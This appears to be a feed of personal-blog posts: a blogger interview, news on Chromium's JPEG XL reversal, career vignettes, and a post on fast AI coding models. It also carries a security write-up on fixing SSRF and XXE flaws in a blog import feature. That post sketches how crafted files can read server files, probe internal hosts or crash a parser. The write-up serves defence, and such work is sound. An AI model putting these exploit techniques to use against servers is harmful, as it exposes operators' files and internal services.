Orleans fan community, providing Instax photo booth services for events. I’ve also hosted K-Pop events here in NOLA as well. My ult K-Pop group is ATEEZ, but I’m a proud multi fan and listen to whatever groups or music catch my attention, including Stray Kids, SHINee, and Mamamoo. I also love 80s and 90s alternative, mainly Depeche Mode, Nine Inch Nails, and Garbage. And yes, I may be named Karen but I refuse to BE a “Karen”. I don’t get upset when people use the term, I find it hilarious. 
So I have been blogging off and on since 2001 or so - back when they were still called “weblogs” and “online journals”. Originally, I was using LiveJournal, but even with a paid account, I wanted to learn more customization and make a site that was truly my own. My husband - then boyfriend - had their own server, and gave me some space on it. I started out creating sites in Microsoft Frontpage and Dreamweaver (BEFORE Adobe owned them!), and moved to using Greymatter blog software, which I loved and miss dearly. I moved to Wordpress in - 2004 maybe? - and used that for all my personal sites until 2024. I’d been reading more and more about the Indieweb for a while and found Bear , and I loved the simplicity. I’ve had sites ranging from a basic daily online journal, to a fashion blog, to a food blog, to a K-Pop and fandom-centric blog, to what it is today - my online space for everything and anything I like. I taught myself HTML and CSS in order to customize and create my sites. No classes, no courses, no books, no certifications, just Google and looking at other people’s sites to see what I liked and how they did it. My previous job before this one, I was a web administrator for a local marketing company that built sites using DNN and Wordpress, and I’m proud to say that I got that job and my current one with my self-developed skills and being willing to learn and grow. I would not be where I am today, professionally, if it wasn’t for blogging. I’ll be totally honest - I don’t have a writing process. I get inspiration from random thoughts, seeing things online, wanting to share the day-to-day of my life. I don’t draft or have someone proof read, I just type out what I feel like writing. When I had blogs focusing on specific things - plus size fashion and K-Pop, respectively - I kept a list of topics and ideas to refer back to when I was stuck for ideas. 
That was when I was really focused on playing the SEO and search engine algorithm game, though, where I was trying to stick to the “two-three posts a week” rule in an attempt to boost my search engine results. I don’t do that now. I do still have a list of ideas on my phone, but it’s nothing I am feeling FORCED to stick to. It’s more along the lines of that I had an idea while I was out, and wanted to note it so I don’t forget. Memory is a fickle thing in your late 40s, LOL. My space absolutely influences my mindset for writing. I prefer to write in the early morning, because my brain operates best then. (I know I am an exception to the rule by being an early bird.) I love weekend mornings when I can get up really early and settle into my recliner with my laptop and coffee, and just listen to some lofi music and just feel topics and ideas out. I also made my office/guest bedroom into a cozy little space, with a daybed full of soft blankets and fluffy pillows and cushions, and a lap desk. In all honesty, my preferred location to write is at a coffeeshop first thing in the morning. I love sitting tucked in a booth with a coffee and muffin, headphones on and listening to music, when the sun is just on the cusp of rising and the shop is still a little too chilly. That’s when the creative ideas light up the brightest and the synapses are firing on all cylinders. Currently, my site is hosted on Bear . I used to be a self-hosted Wordpress devotee, but in mid-late 2024, I got really tired of the bloat that the apps had become. In order to use it efficiently for me, I had to install entirely too many plugins to make it “simpler”. (Shout-out to the Indieweb Wordpress team, though - they work so hard on those plugins!) Of course, the more plugins you have, the less secure your site… My domain is registered through Hostinger . To write my posts, I use Bear Markdown Notes. I heard about this program after seeing a few others talking about using it for drafts, notes, etc. 
I honestly don’t think I’d change much! I really love using Bear Blog. It reminds me of the very old school LiveJournal days, or when I used Greymatter. It takes me back to the web being simpler, more straightforward, more fun. I also like Bear’s manifesto , and that he built the service for longevity . I would probably structure my site differently, especially after seeing some personal sites set up with more of a “digital garden” format. I will eventually adjust my site at some point, but for now, I’m fine with it. (That and between school and work, it’s kind of low on the priority list.) I purchased a lifetime subscription to Bear after a week of using it, which ran around $200 - I don’t remember exactly. I knew that I was going to be using the service for a while and thought I should invest in a place that I believed in. My Hostinger domain renewals run around $8.99 annually. My blog is just my personal site - I don’t generate any revenue or monetise in any way. I don’t mind when people monetize their site - it’s their site and they can do what they choose. As long as it’s not invading others’ privacy or harmful, I have absolutely no issue. Make that money however you like. Ooooh I have three really good suggestions for both checking out and interviewing! Binary Digit - B is kind of an influence for me to play with my site again. They have just this super cool and early 2000s vibe and style that I really love. Their site reminds me of me when I first started blogging, when I was learning new things and implementing what I thought was cool on my site, joining fanlistings, making new online friends. Kevin Spencer - I love Kevin’s writing and especially his photography. Not only that, he has fantastic taste in music. I’ve left many a comment on his site about 80s and 90s synthpop and industrial music. A Parenthetical Departure - Sylvia was one of the first sites I started reading when I started looking up info on Bear Blog. 
They are EXTREMELY talented and have an excellent knack for playing with design, and showing others how it works. One of my side projects is Burn Like A Flame, which is my local K-pop and fandom photography site. I actually just started a project there that is more than slightly based on People and Blogs - The Fandom Story Project. I’m interviewing local fans to talk about what they love and what their feelings are on fandom culture now, and I’m accompanying that with a photoshoot with that person. It’s a way to introduce people to each other within the community. Two of my favorite YouTube channels that I have recently been watching are focused on fashion discussion and history - Bliss Foster and understitch,. If you like learning and listening to information on fashion, I highly recommend these creators. I know a TON of people have now seen K-Pop Demon Hunters (which I love, and the movie has a great message for not only kids, but adults). If you’ve seen this and are interested in getting into K-Pop, I suggest checking out my favorite group, ATEEZ. If you think that most K-Pop is all chirpy bubbly cutesy songs, let me suggest two by this group that aren’t what you’d expect: Guerrilla and Turbulence. I strongly suggest watching without the translations, and then watching again with them. Their lyrics are the thing that really drew me into this group, and had me learning more about the deeper meaning behind a lot of K-Pop songs. And finally, THANK YOU to Manu for People and Blogs! I always find some really great new sites to check out after reading these interviews, and I am truly honored to be asked to join this list of great bloggers. It’s inspiring me to work harder on my blog and to post more often. Now that you're done reading the interview, go check the blog and subscribe to the RSS feed. If you're looking for more content, go read one of the previous 117 interviews. 
Make sure to also say thank you to Benny and the other 127 supporters for making this series possible.

Langur Monkey 1 week ago

Google *unkills* JPEG XL?

I’ve written about JPEG XL in the past. First, I noted Google’s move to kill the format in Chromium in favor of the homegrown and inferior AVIF. [1] [2] Then, I had a deeper look at the format, and visually compared JPEG XL with AVIF on a handful of images. The latter post started with a quick support test: “If you are browsing this page around 2023, chances are that your browser supports AVIF but does not support JPEG XL.” Well, here we are at the end of 2025, and this very sentence still holds true. Unless you are one of the 17% of users using Safari [3], or are adventurous enough to use a niche browser like Thorium or LibreWolf, chances are you see the AVIF banner in green and the JPEG XL image in black/red. The good news is, this will change soon. In a dramatic turn of events, the Chromium team has reversed its tag, and has decided to support the format in Blink (the engine behind Chrome/Chromium/Edge). Given Chrome’s position in the browser market share, I predict the format will become a de facto standard for images in the near future. I’ve been following JPEG XL since its experimental support in Blink. What started as a promising feature was quickly axed by the team in a bizarre and ridiculous manner. First, they asked the community for feedback on the format. Then, the community responded very positively. And I don’t only mean a couple of guys in their basement. Meta, Intel, Cloudinary, Adobe, Krita, and many more. After that came the infamous comment (#85, Oct 31, 2022 12:34AM): Thank you everyone for your comments and feedback regarding JPEG XL. We will be removing the JPEG XL code and flag from Chromium for the following reasons: Yes, right, “not enough interest from the entire ecosystem”. Sure. Anyway, following this comment, a steady stream of messages pointed out how wrong that was, from all the organizations mentioned above and many more. 
People were noticing in blog posts, videos, and social media interactions. Strangely, the following few years have been pretty calm for JPEG XL. However, a few notable events did take place. First, the Firefox team showed interest in a JPEG XL Rust decoder , after describing their stance on the matter as “neutral”. They were concerned about the increased attack surface resulting from including the current 100K+ lines C++ reference decoder, even though most of those lines are testing code. In any case, they kind of requested a “memory-safe” decoder. This seems to have kick-started the Rust implementation, jxl-rs , from Google Research. To top it off, a couple of weeks ago, the PDF Association announced their intent to adopt JPEG XL as a preferred image format in their PDF specification. The CTO of the PDF Association, Peter Wyatt, expressed their desire to include JPEG XL as the preferred format for HDR content in PDF files. 4 All of this pressure exerted steadily over time made the Chromium team reconsider the format. They tried to kill it in favor of AVIF, but that hasn’t worked out. Rick Byers, on behalf of Chromium, made a comment in the Blink developers Google group about the team welcoming a performant and memory-safe JPEG XL decoder in Chromium. He stated that the change of stance was in light of the positive signs from the community we have exposed above (Safari support, Firefox updating their position, PDF, etc.). Quickly after that, the Chromium issue state was changed from to . This is great news for the format, and I believe it will give it the final push for mass adoption. The format is excellent for all kinds of purposes, and I’ll be adopting it pretty much instantly for this and the Gaia Sky website when support is shipped. Some of the features that make it superior to the competition are: For a full codec feature breakdown, see Battle of the Codecs . JPEG XL is the future of image formats. It checks all the right boxes, and it checks them well. 
Support in the overwhelmingly most popular browser engine is probably going to be a crucial stepping stone in the format’s path to stardom. I’m happy that the Chromium team reconsidered their inclusion, but I am sad that it took so long and so much pressure from the community to achieve it.

Footnotes:

1. https://aomediacodec.github.io/av1-avif/ ↩︎
2. https://jpegxl.info/resources/battle-of-codecs.html ↩︎
3. https://radar.cloudflare.com/reports/browser-market-share-2025-q1 ↩︎
4. https://www.youtube.com/watch?v=DjUPSfirHek&t=2284s ↩︎
5. https://youtu.be/qc2DvJpXh-A ↩︎

Reasons given in the Chromium comment:

- Experimental flags and code should not remain indefinitely
- There is not enough interest from the entire ecosystem to continue experimenting with JPEG XL
- The new image format does not bring sufficient incremental benefits over existing formats to warrant enabling it by default
- By removing the flag and the code in M110, it reduces the maintenance burden and allows us to focus on improving existing formats in Chrome

Features that make JPEG XL superior to the competition:

- Lossless re-compression of JPEG images. This means you can re-compress your current JPEG library without losing information and benefit from a ~30% reduction in file size for free. This is a killer feature that no other format has.
- Support for wide gamut and HDR.
- Support for image sizes of up to 1,073,741,823x1,073,741,824. You won’t run out of image space anytime soon. AVIF is ridiculous in this aspect, capping at 8,193x4,320. WebP goes up to 16K², while the original 1992 JPEG supports 64K².
- Maximum of 32 bits per channel. No other format (except for the defunct JPEG 2000) offers this.
- Maximum of 4,099 channels. Most other formats support 4 or 5, with the exception of JPEG 2000, which supports 16,384.
- JXL is super resilient to generation loss. [5]
- JXL supports progressive decoding, which is essential for web delivery, IMO. WebP or HEIC have no such feature. Progressive decoding in AVIF was added a few years back.
- Support for animation.
- Support for alpha transparency.
- Depth map support.

Hugo 1 week ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability.

Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message:

> Huge vuln on writizzy
>
> Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd. Basically, you absolutely need to validate the images from the Medium HTML!
>
> Your /etc/passwd as proof:
>
> Micka

Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities.

## The SSRF Vulnerability

SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive?

The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case).

For example, imagine I have this in a Medium page:

```html
```

I need to download the image, then re-upload it to Bunny.
During the conversion to markdown, I'll then write this:

```markdown
![](https://cdn.bunny.net/blog/12132132/image.jpg)
```

So to do this, at some point I open a URL to the image:

```kotlin
val imageBytes = try {
    val connection = URL(imageUrl).openConnection()
    connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
    connection.setRequestProperty("Referer", "https://medium.com/")
    connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
    connection.connectTimeout = 10000
    connection.readTimeout = 10000
    connection.getInputStream().use { it.readBytes() }
} catch (e: Exception) {
    logger.warn("Failed to download image $imageUrl: ${e.message}")
    return imageUrl
}
```

Then I upload the byte array to Bunny.

Okay. But what happens if the user writes this:

```html
```

The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible.

And you can also access internal URLs to scan ports, get sensitive info, etc.:

```html
```

The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used:

```kotlin
if (url.protocol !in listOf("http", "https")) {
    logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl")
    return imageUrl
}
```

Then, verify that we're not attacking private URLs:

```kotlin
val host = url.host.lowercase()
if (isPrivateOrLocalhost(host)) {
    logger.warn("Blocked private/localhost URL: $imageUrl")
    return imageUrl
}

...

private fun isPrivateOrLocalhost(host: String): Boolean {
    if (host in listOf("localhost", "127.0.0.1", "::1")) return true
    val address = try {
        java.net.InetAddress.getByName(host)
    } catch (_: Exception) {
        return true // When in doubt, block it
    }
    return address.isLoopbackAddress ||
        address.isLinkLocalAddress ||
        address.isSiteLocalAddress
}
```

But here, I still have a risk.
The user can write:

```html
```

And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests:

```kotlin
val connection = url.openConnection()
if (connection is java.net.HttpURLConnection) {
    connection.instanceFollowRedirects = false
}
connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36")
connection.setRequestProperty("Referer", "https://medium.com/")
connection.setRequestProperty("Accept", "image/avif,image/webp,*/*")
connection.connectTimeout = 10000
connection.readTimeout = 10000

val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode
if (responseCode in listOf(301, 302, 303, 307, 308)) {
    logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)")
    return imageUrl
}
```

Be very careful with user-controlled connection opening.

Except it wasn't over. Second message from Micka:

> You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :)

## The XXE Vulnerability

XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to:

- Read local files (/etc/passwd, config files, SSH keys...)
- Perform SSRF (requests to internal services)
- Perform DoS (billion laughs attack)

Micka modified the WordPress XML file to add an entity declaration:

```xml
]> ... &xxe;
```

This directive asks the XML parser to go read the content of a local file to use it later.

It would also have been possible to send this file to a URL directly:

```xml
%dtd; ]>
```

And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd):

```xml
"> %all;
```

Finally, to crash a server, the attacker could also have done this:

```xml
]> &lol9; 1 publish post
```

This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea.
We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities:

```kotlin
val factory = DocumentBuilderFactory.newInstance()

// Disable external entities (XXE protection)
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)
factory.setFeature("http://xml.org/sax/features/external-general-entities", false)
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false)
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false)
factory.isXIncludeAware = false
factory.isExpandEntityReferences = false
```

I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack.

FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.
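As a recap of the SSRF checks described earlier, here is a minimal sketch that folds the protocol check and the private-address check into one function. This is not the code running on writizzy: the names `isSafeImageUrl` and `isInternal` are hypothetical, and the extra checks for wildcard, multicast, and IPv6 unique-local addresses are my own assumption about what is worth blocking. It also does not handle redirects or DNS rebinding (the host is resolved again when the connection is opened), so treat it as a first filter only.

```kotlin
import java.net.InetAddress
import java.net.URI

// Hypothetical helper, not from the original import code.
// Returns true only if the URL is http/https and every address
// the host resolves to looks publicly routable.
fun isSafeImageUrl(rawUrl: String): Boolean {
    val uri = try {
        URI(rawUrl)
    } catch (e: Exception) {
        return false // Unparseable URL: block it
    }
    val scheme = uri.scheme?.lowercase() ?: return false
    if (scheme != "http" && scheme != "https") return false

    val host = uri.host ?: return false
    val addresses = try {
        InetAddress.getAllByName(host)
    } catch (e: Exception) {
        return false // When in doubt, block it
    }
    // A host can resolve to several addresses; reject if any is internal.
    return addresses.none { isInternal(it) }
}

// Hypothetical helper: true for loopback, wildcard, link-local,
// site-local, multicast, and IPv6 unique-local (fc00::/7) addresses.
private fun isInternal(address: InetAddress): Boolean {
    if (address.isLoopbackAddress || address.isAnyLocalAddress ||
        address.isLinkLocalAddress || address.isSiteLocalAddress ||
        address.isMulticastAddress
    ) return true
    val bytes = address.address
    // isSiteLocalAddress does not cover IPv6 unique-local addresses.
    return bytes.size == 16 && (bytes[0].toInt() and 0xfe) == 0xfc
}
```

Calling `isSafeImageUrl(imageUrl)` before opening the connection, and still disabling redirects as shown above, keeps both defenses in place.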

Jason Scheirer 1 week ago

A Series of Vignettes From My Childhood and Early Career

A short set of anecdotes, apropos of nothing. When I was younger, I really liked programming! I loved the sense of accomplishment, I loved the problem solving, I loved sharing what I made with the people around me to both amuse and assist. One particularly wise adult (somewhere around 1996) took me aside and said, “You know, you’re lucky you enjoy programming, because you won’t be able to make a living on it in the future. Doing it for love over money is a good idea.” “Coding is over, with Object Oriented programming one person who is much smarter than any of us could hope to be will develop the library just once and we will all use it going forward, forever. Once a problem is solved it never needs solving again. “In 5 years there’s going to be a library of objects, like books on a bookshelf, and every software problem will be solved by business people just snapping the object libraries they need together like LEGOs. They won’t need you at all.” I thought about this advice, and how Software Engineering would be ending by the time I entered school. I realized I had not even thought about my education yet. I was in middle school. Programming was not it, though, I knew that. I’m here nearly 30 years later and software continues to pay my bills, despite everything. Open source exists, there are libraries I can use to piece things together to solve all the time. New problem sets not covered by the garden path come up all the time. Clicking the LEGOs together continues to be a hard task. Every time we fix it at one level of abstraction we operate one level higher and the world keeps turning. Whenever I’m threatened with a good time and someone proclaims “this is it for you” all that happens is my job becomes more annoying. Haven’t gotten the sweet release of extinction quite yet. Around 1993 or so was the advent of the “Multimedia Age.” Multimedia was the buzzword. Software has to be multimedia ready . Education had to teach children to be ready for the multimedia age . 
If your tool, however inappropriate as it was, did not have multimedia features, you were going to be left behind. You needed a video guide. You needed to be on CD-ROM. This is just the new normal. “Multimedia” just means “sound and video.” We had a high concept term for a very direct, low concept concept. And the multimedia boom fizzled out. It became boring. Nobody is impressed by a video on a website and nobody thinks less of a website that doesn’t use sound and video if it’s not appropriate. You pop a tag in your HTML and your job is done. The amazing thing became mundane. The dream of “multimedia” became commonplace and everyone just accepted it as normal. I’m not aware of any industries that collapsed dramatically due to multimedia. Nobody really reskilled. Video editing is still a pretty rare thing to find, and we don’t commonly have sound engineers working on the audio UX of software products. In 2000 a coworker took me aside and showed me his brand-new copy of IntelliJ IDE. “It’s over for us,” he said, “this thing makes it so programmers aren’t strictly necessary, like one person can operate this tool and they can lay the rest of us off.” I was pretty awestruck, he got some amazing autocomplete right in the IDE. Without having to have a separate JavaDocs window open to the side, and without having to manually open the page for the class he needed documentation on, it just was there inline. It gave him feedback before the compile cycle on a bunch of issues that you normally don’t see until build. That was a nice bit of preventative work and seemed to have the potential to keep a developer in flow longer. And then he showed me the killer feature “that’s going to get us all out of a job:” the refactoring tools. He then proceeded to show me the tools, easily moving around code to new files, renaming classes across the codebase, all kinds of manual things that would have taken a person a few days to do on their own. It was magical. 
After some thought I said, “that’s amazing, but does it write new logic too or does it just move code around?” He didn’t seem fazed by that, and doubled down on the insistence that these powerful tools were our doom. I made a distinction between “useful” code and “filler” code, but apparently what is valued is not the quality and nature of the code but its volume and presence. This tool definitely gave both volume and presence to the tiny human-written nuggets within. At my first job in High School I was working in an office in a suburban office park with programmers from many different local agencies. One guy I chatted up was a contractor: these people were highly regarded, somewhat feared specialists. The guy in question was working on a multi-year migration of some county health computer system from MUMPS to a more modern relational system. He showed me the main family of problems he was solving to show off how smart he was for solving them; they were largely rote problems of migrating table schemas and records in a pretty uniform way. But there were a lot of them, and he was working hard to meet his deadline! I thought about it, and seeking his approval and validation, set out to help him. To show what I could do. I wrote a Python script that could solve the 85% case (it was mostly string manipulation) and even put a little TkInter dialog around it so he could select the files he wanted to migrate visually. It ran great, but he looked a little afraid when I demonstrated it to him: “You didn’t show this to anyone else, did you?” “Nope.” “Oh thank God.” I take it he used my tool because he had a lot more free time to goof off for the remaining six months of his contract. I don’t think he told anyone else what he had either, but I’m guessing that he had a lot more MUMPS migration contracts lined up when he could finish them in a matter of days. At the same job, I was paid to maintain a series of government agency web sites. 
One of my main tasks was to keep a list of mental health providers up-to-date on an HTML page and upload it to the server. This process was pretty mechanical: take Excel sheet from inbox, open in Excel, copy Excel table to HTML table. Within a month I had a fully automated workflow. I lived in fear of being found out, and told no one that the thing I was getting paid to do was no longer being done by me. About 9 months later the department in question hired a full-time web developer for $45k/yr to bring their website in-house. I was costing them about $25/hr, probably skating under $2000/yr for my outsourced services. This was clearly not about money. And what I feared did not happen. When I no longer had that work to sustain me my managers just put me on something else. There’s always more work.

In my last years of undergraduate education and my first couple of years out of college I worked on projects that did some sort of Natural Language Processing tasks. For these we required training data, and the more the better. On that, though, we had responsibilities. We had to make sure the data we had also came with some sort of license or implicit permission. You didn’t just steal a pile of PDFs or scoop up a person’s web site and put it in your training set. There were ethical constraints, and legal consequences. You acted above-board when training your AI models. There were times we’d train models on Wikipedia dumps. The results were always comparatively amazing when we trained on good, large data like that. Cogent. Interesting. Even a simple Markov chain on Wikipedia looked smart. When we wrote web crawlers, we wrote them to respect . We kept them on local domains. The field of the crawlers included our email address, and if an angry webmaster didn’t like the way we were crawling them we’d fix it. Getting crawled aggressively at once taxed servers and spammed logs so we’d space it out to hours or days.
If their was missing or malformed and they still didn’t want us there, we’d block the site from crawling. We made sure we had explicit permission to collect data for our training corpora.

The dot com boom was a crazy time. The internet had just become mainstream and there was a new gold rush. Money was there just for the taking, so many VC funded business plans were just “traditional business X, but on the internet!” and the money flowed. How it flowed. Most of these companies, however, didn’t really have a solid business model other than buying some servers and a domain name and “we’ll put this thing on the internet.” Out of this crash came green shoots: Web 2.0, which used the web natively, organically, gave a good web-native experience. Eventually the dream of the internet, the promise of the hype, was made manifest after a lot of people learned a lot of really unnecessary, really painful lessons. They spent less and put their things on the internet because they made sense on the internet of the present, not because the internet was the next big thing. The dream of the widespread, ubiquitous internet came true, and there were very few fatalities. Some businesses died, but it was more glacial than volcanic in time scale. When ubiquitous online services became commonplace it just felt mundane. It didn’t feel forced. It was the opposite of the dot com boom just five years later: “the internet is here and we’re here to build a solid business within it” in contrast with “we should put this solid business on the internet somehow, because it’s coming.”

This is indeed a set of passive-aggressive jabs at the continuing assault on our senses by the LLM hype lobby.
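The crawler etiquette described above (honor the site's crawl rules, identify yourself with a contact address, space requests out) could be sketched roughly like this. This is a minimal illustration, not the code we ran back then: it assumes the crawl rules in question are a site's robots.txt file, and the user agent string, contact address, and default delay are hypothetical placeholders.

```python
import urllib.robotparser

# Hypothetical crawler identity; the contact address is a placeholder.
USER_AGENT = "research-crawler/1.0 (+mailto:crawler-admin@example.org)"


def load_rules(robots_txt: str) -> urllib.robotparser.RobotFileParser:
    """Parse the text of a robots.txt file into a rule set."""
    parser = urllib.robotparser.RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser


def plan_fetch(parser, url, default_delay=60.0):
    """Return the seconds to wait before fetching url, or None if disallowed."""
    if not parser.can_fetch(USER_AGENT, url):
        return None  # the site does not want us here, so skip it
    delay = parser.crawl_delay(USER_AGENT)
    # Fall back to our own (assumed) polite delay if the site names none.
    return float(delay) if delay is not None else default_delay
```

A real crawler would fetch robots.txt over the network and sleep for the returned delay between requests; both are left out so the sketch stays self-contained.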
The automated workflow, step by step:
1. I used Windows Automation to watch my Outlook inbox.
2. When an email came in from the person who sent me the Excels it would download it.
3. Open the Excel file in Excel using Windows Automation.
4. Export it to CSV from Excel (the automation did this, I simply watched a ghost remote control an Excel window that opened and closed itself).
5. Run a Python script that would inject that CSV data as an HTML table into the file.
6. Run another Python script that would connect to the FTP server and upload the file. It would randomly pause and issue typos so it looked like the FTP session was being operated by a human at a keyboard, so nobody thought anything of my plot.
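The "inject that CSV data as an HTML table" step might have looked something like the sketch below. The original script is long gone, so treat this as a reconstruction under assumptions: the function names and the placeholder marker in the page are hypothetical, and the first CSV row is assumed to be the header.

```python
import csv
import html
import io


def csv_to_html_table(csv_text: str) -> str:
    """Render CSV text as an HTML table, treating the first row as the header."""
    rows = list(csv.reader(io.StringIO(csv_text)))
    if not rows:
        return "<table></table>"
    header, body = rows[0], rows[1:]
    lines = ["<table>"]
    # Escape every cell so stray "&" or "<" in the spreadsheet cannot break the page.
    lines.append("<tr>" + "".join(f"<th>{html.escape(c)}</th>" for c in header) + "</tr>")
    for row in body:
        lines.append("<tr>" + "".join(f"<td>{html.escape(c)}</td>" for c in row) + "</tr>")
    lines.append("</table>")
    return "\n".join(lines)


def inject_table(page: str, table_html: str, marker: str = "<!-- PROVIDERS -->") -> str:
    """Replace a placeholder marker in the page with the generated table."""
    if marker not in page:
        raise ValueError(f"marker {marker!r} not found in page")
    return page.replace(marker, table_html, 1)
```

Keeping a marker comment in the page template means the script never has to parse the surrounding HTML; it only swaps one known string for the fresh table.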

Kix Panganiban 2 weeks ago

First make it fast, then make it smart

In the speed vs. intelligence spectrum, I've always figured the smarter AI models would outperform faster ones in all but the most niche cases. On paper and in benchmarks, that often holds true. But I've learned -- at least for me personally -- that faster models bring way more utility to the table. Man, I hate the word "agentic." I find it to be trendy and pretentious, but "AI-assisted coding" is a mouthful with too many syllables, so I'll begrudgingly stick with "agentic" coding for now. When it comes to agentic coding, the instinct is to pick a smart model that can make clever changes to your code. You know, the kind that thinks out loud, noodles on an idea for a bit, then writes code and stares at it for a bit. On the surface, that seems like the way to go -- but for me, it's often a productivity killer. I've got ADHD, and even on meds, my attention span is flaky at best. Waiting for a model to "think" while it performs a task makes me lose focus on what it's even doing. (This is also why I don't believe in running agents in parallel, or huge plan-think-execute loops like what Google Antigravity does.) My brain wanders off, and by the time the model's done, I've got to context-switch back to review its work. Then I ask for changes, wait again, and repeat the cycle. It's slow, painfully boring, and doesn't even guarantee I'll get what I want. Those little dead-air moments are what ruin it for me. I took a break from agentic coding for a while and went back to writing code by hand. No waiting, no boredom, and I always got exactly what I needed (usually). But then I realized something -- not all coding tasks need deep thought. My buddy Alex likes to call them "leaf node edits": small, trivial changes that are more mechanical than cerebral. Think splitting functions, renaming stuff (when doesn't cut it), or writing HTML and Markdown. These are perfect to delegate to AI because failures at tasks like these are rarely consequential, and mistakes are easier to spot.
I think the trick really here is to not rely on AI to think or make architectural or design decisions. Do the planning and heavy lifting yourself; just use the tool for fast, broad-sweeping autocomplete. It's less like hiring a programmer and more like extending your typing speed. I once wrote about how Dumb Cursor is the best Cursor and that Cursor peaked with its first Composer release (I don't know why they chose to name two distinctly different features the same, but who knows anything these days). I take it all back. Composer is back with a vengeance, and it's fast . Aggressively fine-tuned for parallel tool calling, it flies through making changes -- even if it's not that smart. It makes silly mistakes and sometimes spits out vibe-codey slop (think: too many inline comments, ignoring , or overusing where it's not needed) -- but because it's so dang quick , it's a joy to use. For those leaf node edits, speed beats smarts every time. I've also tinkered with other fast models like Gemini Flash. It's cheap and decently smart, but it's just too unreliable for me. Google's API endpoints randomly conk out, I've found that it struggles with tool calling, and it'll hallucinate if you stuff too much into its context (which it touts as obnoxiously large). I'm sure there are workarounds -- but I don't want to fuss with it. My goal with agentic coding is low-friction help, not a side project to debug the tool itself. Then there are superfast inference providers like Cerebras , Sambanova , and Groq . They let you run open-weight, smart models (think Qwen or Kimi) at lightning speed. If I weren't already using Cursor, I'd probably go back to Roo or Crush with these. I just don't want to be managing multiple providers, API keys, and strict rate limiting -- it feels like a hassle, kinda defeating the purpose of a fast model. At the end of the day, my brain craves tools that keep up with me, not ones that make me wait. 
Faster models might not be the smartest, but for leaf node edits and mechanical tasks, I find them to be much more palatable. I'd rather iterate quickly and fix small goofs than sit through a slow model's deep thoughts. Turns out, speed isn't just a feature for me -- it's a necessity.

Manuel Moreale 2 weeks ago

Alexandra Wolfe

This week on the People and Blogs series we have an interview with Alexandra Wolfe, whose blog can be found at wrywriter.ca . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Piet Terheyden and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. I’m a viviparous, mammalian, carbon-based biped — a veritable fossil from a bygone age sometimes referred to as the Good Old Days. Though, to be honest, that’s debatable to the nth degree. I was born in Germany to British parents and moved across the planet every 2-3 years, all of which seemed very natural to me at the time. Apart from studying for 3 degrees (I never finished any of them) I did several years in the military ostensibly as an air traffic controller. I then somehow stumbled from there into the print & publishing trade and made a comfortable living working on books and magazines. I even rubbed shoulders with a few names over the years, which in and of itself, was pleasantly entertaining. Being in the publishing trade allowed me to indulge in a number of my fav hobbies, including publishing a couple of scifi ezines over the years, run a Star Trek club, hang out at several scifi and comic cons, and meet the stars and writers of many of my fav scifi shows. I still have the photographic evidence to prove it. I didn’t so much as decide to blog as stumble into it, like many back in the days of LiveJournal and MySpace, we all just followed the crowd. It then seemed logical (at the time) to upgrade from a MySpace account to bumbling around with HTML creating a static website that was then quickly superseded by me creating an official ‘Blog’. At that point I was using the then new Wordpress software. It was, for me at least, revolutionary. Suddenly, everyone was blogging about everything. 
It’s at that point I think I bought my first domain name: wrywriter and used the dot com version till right up till a few years ago when I added the dot ca version and, sadly, let the dot com version lapse. Though now, I wish I had kept it. Now, I still have the name, but have moved away from Wordpress and blog ‘lightly’ using Bear Blog and Micro Blog to scribble and share my thoughts on. Clean, small, simple and more focused on the actual writing and less on the tweaking and tinkering. Both platforms suit my current needs. I’m not sure I have a process per se. I don’t plan posts, and don’t jot down ideas. I’m more of a pantster, I stare at the blinking cursor only when I feel like I have something to say. Whether that be some random thought I had over breakfast, a news item I want to respond to, or a response to someone else’s post. I don’t do research, or make drafts, or have endless notebooks full of ideas. Unless we’re talking about short stories or ideas for novels. Blogging, for me, is more about spontaneity. I would have to say that physical space can and probably does influence how anyone writes. And that we all have our own particular quirks and eccentricities when it comes to our writing environment. I like mine to be quiet, clean, and minimal. There are a few toys I have at hand I play with, but other than that, it’s me and the keyboard, and a large screen. You’re asking a dinosaur who somehow lived long enough to stumble into a Jetson’s future what my Tech Stack is? Excuse me while I consult someone smarter than I am about what a tech stake might look like. Oh, you mean where did I buy my domain name and that sort of thing? I want to say Porkbun because I just love saying Porkbun. But no such luck, I sourced my domains here, in Canada, with WHC.ca and, at one time I 